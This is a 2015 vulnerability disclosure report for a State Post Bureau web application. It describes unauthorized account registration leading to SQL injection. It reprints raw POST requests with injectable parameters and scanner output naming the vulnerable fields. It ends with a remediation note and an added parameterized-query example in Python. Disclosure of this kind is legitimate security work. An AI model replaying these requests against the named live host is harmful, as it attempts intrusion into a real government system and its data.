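2015-09-29: Details reported to the vendor; awaiting vendor handling
2015-09-30: Vendor confirmed; details disclosed to the vendor only
2015-10-10: Details disclosed to core white hats and relevant domain experts
2015-10-20: Details disclosed to regular white hats
2015-10-30: Details disclosed to trainee white hats
2015-11-14: Details disclosed to the public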
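Unauthorized access, leading to SQL injection
http://kdjyxk.post.gov.cn/company/reg.jsp?provinceId=0 exposes a registration page where an account can be registered, which lets us log in to the back end. After logging in, there are multiple SQL injection points inside. First, there is the example someone reported earlier, WooYun: State Post Bureau back end weak password & SQL injection & arbitrary file upload (bundled vulnerability collection). There turn out to be many more SQL injection points, such as:
In the branch management function, branch filing management has a SQL injection. The POST request is as follows: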
POST /sys_getQuestionList.do?flag=1 HTTP/1.1
Host: kdjyxk.post.gov.cn
Proxy-Connection: keep-alive
Content-Length: 63
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://kdjyxk.post.gov.cn
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.93 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://kdjyxk.post.gov.cn/sys_getQuestionList.do?flag=1
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,en;q=0.6
Cookie: JSESSIONID=C552137D3B39FFF8023D295C63330E8D

questionKey=*&questionDate=&questionDateEnd=&questionStatus=0
In the branch management function, branch filing account management has a SQL injection:
POST /register_beianLogin.do?flag=1 HTTP/1.1
Host: kdjyxk.post.gov.cn
Proxy-Connection: keep-alive
Content-Length: 65
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://kdjyxk.post.gov.cn
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.93 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://kdjyxk.post.gov.cn/register_beianLogin.do?flag=1
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,en;q=0.6
Cookie: JSESSIONID=C552137D3B39FFF8023D295C63330E8D

fbcomcName=&fbcomcLoginName=&province=1&city=0&x=28&y=16
Parameters vulnerable to SQL injection:
[0] place: POST, parameter: fbcomcName, type: Single quoted string (default)
[1] place: POST, parameter: fbcomcLoginName, type: Single quoted string
[2] place: POST, parameter: province, type: Unescaped numeric
[3] place: POST, parameter: city, type: Unescaped numeric
questionKey=*&questionDate=&questionDateEnd=&questionStatus=0
Prevent unauthorized access, use parameterized queries to filter out SQL injection, and deploy a WAF.
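The parameterized-query fix recommended above, as an added example that is not part of the original report or the vendor's code. It uses Python's sqlite3 as a stand-in for the application's back end; the table, column and function names, the sample rows, and the reading of 0 as "all" are assumptions, while the four field names come from the request shown in the report.

```python
import re
import sqlite3

def make_db():
    # Constructed sample data; schema and rows are assumptions for illustration.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE branch_account "
               "(name TEXT, login TEXT, province INTEGER, city INTEGER)")
    db.executemany("INSERT INTO branch_account VALUES (?, ?, ?, ?)",
                   [("North Branch", "north01", 1, 10),
                    ("South Branch", "south01", 2, 20)])
    return db

def search_concat(db, form):
    # Anti-pattern matching the findings: a string field spliced inside single
    # quotes and a numeric field spliced with no quoting at all.
    sql = ("SELECT login FROM branch_account WHERE name LIKE '%"
           + form["fbcomcName"] + "%' AND province = " + form["province"])
    return [row[0] for row in db.execute(sql)]

def to_int(value, field):
    # Numeric fields are validated and converted before they reach the query.
    if not re.fullmatch(r"[0-9]{1,6}", value):
        raise ValueError(f"{field} must be a non-negative integer")
    return int(value)

def search_bound(db, form):
    # Hardened form: the SQL text is constant, every request value is bound.
    province = to_int(form["province"], "province")
    city = to_int(form["city"], "city")
    sql = ("SELECT login FROM branch_account "
           "WHERE name LIKE ? AND login LIKE ? "
           "AND (? = 0 OR province = ?) AND (? = 0 OR city = ?)")
    args = ("%" + form["fbcomcName"] + "%", "%" + form["fbcomcLoginName"] + "%",
            province, province, city, city)
    return [row[0] for row in db.execute(sql, args)]

if __name__ == "__main__":
    db = make_db()
    form = {"fbcomcName": "'", "fbcomcLoginName": "", "province": "1", "city": "0"}
    print("bound query, quote in name:", search_bound(db, form))
    try:
        search_concat(db, form)
    except sqlite3.OperationalError as exc:
        print("concatenated query broke on the same input:", exc)
```

With bound parameters a quote in fbcomcName is matched as literal data, and a non-numeric province is rejected before any SQL runs.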
Severity: High
Vulnerability Rank: 10
Confirmed: 2015-09-30 08:59
Thank you for your contribution
None yet